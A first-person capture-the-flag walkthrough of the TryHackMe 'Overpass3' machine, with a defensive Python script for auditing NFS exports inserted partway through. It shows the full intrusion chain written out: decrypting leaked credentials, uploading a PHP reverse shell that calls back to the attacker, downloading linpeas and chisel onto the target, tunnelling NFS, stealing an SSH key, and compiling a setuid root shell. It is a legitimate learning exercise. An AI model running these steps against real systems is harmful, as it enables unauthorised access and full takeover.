Hello folks! This is my first write-up on the subject of cybersecurity.
Let's get started!
Overpass3 | THM
Deploy the machine and wait for about 5 minutes for all services to start.
Let's start with a check of the running services to get an idea of what we have to work with.
NMAP
$ sudo nmap -sC -sV -oN initial <Target-IP-address>
NMAP reports 3 services.
- FTP on port 21
- SSH on port 22
- HTTP on port 80.
Webservice
Let's start by looking at the web service.
Indeed we have an index page, but a quick look around did not give much info.
We have potential users that we can take a note of:
Paradox
Elf
MuirlandOracle
Ninjac01
James
Let's run gobuster against this web page to see if we can access some more data.
Gobuster
$ gobuster dir -u <target IP-address> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log
Meanwhile, as gobuster runs, let's look at whether we can access the FTP service anonymously.
FTP
In general, you enter the word anonymous or ftp when the host prompts you for a username; you can enter anything for the password, such as your e-mail address or simply the word “guest”.
Credentials to use:
Name: anonymous
Password:
$ ftp <Target IP-address>
Connected to 10.x.x.x.
220 (vsFTPd 3.0.3)
Name (10.x.x.x:user): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp>
Anonymous login failed, let's move on!
Gobuster
Reports a directory called /backups.
Let's hit this page and see what we can find.
http://Target-IP-address/backups/
Let's download it and see what's inside!
$ wget http://Target-IP-address/backups/backup.zip
ZIP-archive
And unzip it with:
$ unzip backup.zip
Looks like we have an encrypted GPG file, CustomerDetails.xlsx.gpg.
GNU Privacy Guard (GPG) allows you to securely encrypt files so that only the intended recipient can decrypt them.
And a private key!!?
Let's see if it works for decrypting the GPG file!!
Decryption
Run following commands in terminal.
$ gpg --import priv.key
Nice, the import worked.
Let's try decrypting our file!
$ gpg -d CustomerDetails.xlsx.gpg > CustomerDetails.xlsx
We have decrypted the data from CustomerDetails.xlsx.gpg into a new file named CustomerDetails.xlsx.
Let's have a look at what's inside our decrypted file CustomerDetails.xlsx.
I used LibreOffice Calc to view the file.
This looks great!! Some usernames and passwords!
SSH
SSH requires keys and does not accept passwords on this box, so this is a dead end for now.
FTP
We still have an FTP service that we can try the credentials against, let's do it!
$ ftp <Target IP-address>
Connected to 10.x.x.x.
220 (vsFTPd 3.0.3)
Name (10.x.x.x:user): paradox
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
Nicely!!
We have some files and directories; the backups directory seems to contain the same zip file we downloaded before. We can also see the index.html file.
Let's put a file in here and test if we can access it from our browser on the website!
PHP reverse-shell
We will download a PHP reverse shell to our box, edit it, and upload it to the victim box through FTP.
Download php-reverse-shell.php to your box:
https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
You can use the wget command to download it:
$ wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
To have an easier filename to work with, let's rename the file:
$ mv php-reverse-shell.php rev.php
EDIT
In rev.php, change the ip line to your THM IP (the IP of your attacker box, 10.x.x.x) and the port line to a port you would like to use (above 1024):
$ nano rev.php
I'm using port 9001.
Let's upload it to the FTP server, logged in as the paradox user, with the put command.
FTP
ftp> put rev.php
# or, with a full path on your box:
ftp> put /path/to/your/file/rev.php rev.php
When the transfer is complete, exit the FTP server:
ftp> exit
Reverse shell
Start a netcat listener on the port we picked in the rev.php file (I'm using port 9001).
Netcat:
$ nc -lvnp 9001
Then visit the page from your browser and check netcat (nc) for a connection.
http://Target-IP-address/rev.php
Netcat (nc)
listening on [any] 9001 …
connect to [10.x.x.x] from (UNKNOWN) [10.x.x.x] 36198
Linux localhost.localdomain 4.18.0-193.el8.x86_64 #1 SMP Fri May 8 10:59:10 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
13:12:19 up 2:46, 0 users, load average: 0.00, 0.00, 0.00
Check the user id:
$ id
Greaaaat!! We have a shell as the user apache!!
Escalate to another user
$ su paradox
Password: ****************
We use the credentials we got from the CustomerDetails.xlsx file.
Check id with the id command:
$ id
uid=1001(paradox) gid=1001(paradox) groups=1001(paradox)
OK, great: the FTP password was reused for the user paradox, which worked. The other usernames and passwords in the xlsx file, which I tried but are not shown in this write-up, did not work.
Let's run LinPEAS to see if we can find something to escalate privileges with!
Linpeas
LinPEAS is a script that searches for possible paths to escalate privileges on Linux/Unix* hosts. The checks are explained on book.hacktricks.xyz.
On your attacker machine (your box), download LinPEAS:
$ wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
Python
Python ships with a web server out of the box; you can start one with a one-liner.
Start an HTTP server on your machine in the same directory where you saved linpeas.sh:
$ python3 -m http.server
On the victim machine (target machine), as the paradox user,
change directory to /dev/shm:
$ cd /dev/shm
Curl
Download linpeas from your box to the victim box (target box): specify http://Your-IP-address:port/filename and the output file with the curl command:
$ curl http://Your-IP-address:PORT/linpeas.sh -o linpeas.sh
Chmod
Let's make this file executable:
$ chmod +x linpeas.sh
And run it:
$ ./linpeas.sh
no_root_squash:
More info about the subject: https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
It took me a couple of hours to find a solution for this!
Let's start by upgrading our shell!
Upgrade your shell
In the command line on the victim box (target machine):
$ python3 -c "__import__('pty').spawn('/bin/bash')"
Tunneling
Chisel is a fast TCP/UDP tunnel, transported over HTTP.
https://github.com/jpillora/chisel
Download and install the binary on your attacker box.
A great resource for more information about chisel and an alternative installation method:
https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html
Download chisel to the victim box (target machine)
Make a copy of the chisel binary in your current working directory and download it to the victim box (target box) as we did with linpeas.
On victim box make sure that /dev/shm is your current working directory.
Re-start your python3 http.server if you have closed it.
Your box (attacker machine)
$ cp /usr/local/bin/chisel .
From the victim box (target machine):
$ curl http://Your-IP-adress:PORT/chisel -o chisel
Make the chisel binary executable on victim box (target machine).
$ chmod +x chisel
Chisel
On your machine (attacker box):
$ chisel server --reverse --port 9002
Victim box (target machine)
$ ./chisel client 10.x.x.x:9002 R:2049:127.0.0.1:2049 &
2021/01/13 11:41:50 client: Connecting to ws://10.x.x.x:9002
2021/01/13 11:41:50 client: Connected (Latency 47.076869ms)
Information about how reverse chisel works (learning information only):
$ chisel server --reverse --port 9002
# On the server side, port 9002 is an arbitrary port we chose to listen on.
$ ./chisel client 10.x.x.x:9002 R:2049:127.0.0.1:2049
# R:2049 means that when the connection is established on port 9002 with your server at 10.x.x.x, the server (your box) also opens port 2049.
# Then, when a packet goes to port 2049 on your side, it is redirected through the tunnel on port 9002 and delivered to 127.0.0.1:2049 on the victim/target side.
# Hope you get the workflow, let's move on.
Great we are connected with chisel!!
NFS mounting
As we saw earlier in this write-up, /etc/exports shows us the configuration of the NFS server. The fsid=0 option makes /home/james the root of the export, so it is mounted as /.
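From the defender's side, the export line above is the whole story: fsid=0 plus no_root_squash on a writable share. The following audit script is an added example, not part of the original write-up or of any tool it uses; it parses exports(5) text, flags clauses that do not squash root, and rewrites them to root_squash. The sample exports text is constructed, not the box's real file.

```python
import re

# Constructed sample /etc/exports text (not the box's real file). The first
# line mirrors the misconfiguration the write-up exploits: fsid=0 makes
# /home/james the root of the export and no_root_squash leaves a client's
# uid 0 unmapped, so files written as root over the mount stay root-owned.
SAMPLE_EXPORTS = """\
# /etc/exports (constructed example)
/home/james *(rw,fsid=0,sync,no_root_squash)
/srv/data   10.0.0.0/24(ro,sync,root_squash)
/srv/shared 10.0.0.5(rw,sync,no_subtree_check)
"""

# One client clause: host-or-network followed by a parenthesised option list.
CLIENT_RE = re.compile(r"(\S+?)\(([^)]*)\)")


def parse_exports(text):
    """Yield (path, client, option-set) for every client clause in the text."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        parts = line.split(None, 1)
        if len(parts) < 2:
            continue
        path, clients = parts
        for client, opts in CLIENT_RE.findall(clients):
            yield path, client, {o.strip() for o in opts.split(",") if o.strip()}


def audit_exports(text):
    """Return findings for exports that do not squash root; rw + no_root_squash
    is the combination that lets a remote root plant a root-owned setuid file."""
    findings = []
    for path, client, opts in parse_exports(text):
        if "no_root_squash" not in opts:
            continue
        reasons = ["no_root_squash: remote uid 0 is not mapped to nobody"]
        if "rw" in opts:
            reasons.append("rw: remote root can write root-owned files into the share")
        if client == "*":
            reasons.append("wildcard client: any host reaching port 2049 qualifies")
        findings.append({"path": path, "client": client, "reasons": reasons})
    return findings


def harden_exports(text):
    """Rewrite every clause so root is squashed (root_squash is the exports(5)
    default; spelling it out makes the intent visible in the file)."""
    def fix(m):
        opts = [o.strip() for o in m.group(2).split(",") if o.strip()]
        opts = ["root_squash" if o == "no_root_squash" else o for o in opts]
        return f"{m.group(1)}({','.join(opts)})"
    return "\n".join(CLIENT_RE.sub(fix, line) for line in text.splitlines())
```

Run it against a copy of a real /etc/exports to list the offending clauses; after changing the file, `exportfs -ra` reloads it on the server.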
Your Attacker box
Make a new folder which we will then mount to the victim box's (target machine's) /
$ mkdir mount
$ sudo mount -t nfs localhost:/ mount/
Check if it worked and list the contents.
If you get something like "bad option; for several filesystems (e.g. nfs, cifs) you might need a /sbin/mount.<type> helper program.", then you are missing an NFS package; install it with $ sudo apt install nfs-common
$ cd mount
$ ls -al
Here is the user.flag, which we can access!! (We are inside /home/james.)
We can also see the .ssh folder!
Let's check what's inside:
$ cd .ssh/
$ ls
Grab the id_rsa file and drop it on your box: you can use the cp command, or just cat the file and copy the data over to your box. Save the file as id_rsa on your box.
SSH
We will SSH in as james with the id_rsa to see if we can get in.
$ chmod 600 id_rsa
$ ssh -i id_rsa james@<Target-IP-address>
Great, we are in. We will get back to this SSH session as james to run a binary later on. Also keep our chisel service and mount point running!! Let's work on the next step!!
GETTING ROOT with a binary
On your machine (attacker box!), in your NFS mount (the mount directory we created),
the same place as the user.flag and .ssh folder on your box, type in the terminal:
$ echo '#include <stdlib.h>' > exploit.c
$ echo '#include <unistd.h>' >> exploit.c
$ echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' >> exploit.c
Then
$ sudo gcc exploit.c -o exploit
This compiles a binary that simply sets the GID and UID to root using setgid() and setuid() and then executes a bash shell.
Then:
$ sudo chmod +s exploit
Let's try if we can get a root shell!!
Let's run the binary as the james user we SSH'd in as earlier:
Execute the binary
$ ./exploit
$ id
# Well done!! We have our root shell, let's grab the root flag!!
$ cd /root
$ ls
Nicely, we have our root.flag.
Wait a minute!! We are missing one flag: the web.flag!!
I looked for the web flag for many hours and then gave up on it. This was before I had the james or root shell. Let's try again!!
Web flag
Hunting the web flag and finishing the box!!
As we know, our two flags end with the .flag extension. Could it be somewhere in the filesystem we missed looking in????
Find the web flag!
$ find / -type f -name "*.flag" 2>/dev/null
$ cd /usr/share/httpd/
$ ls -al
Now we have all of the flags which we can submit to the room.
Well done!
I hope you enjoyed the box and my first written write-up!
Thanks to the THM team and the room owner for this beginner-friendly, challenging box!
Be safe! Happy hacking!
//Ekkie!!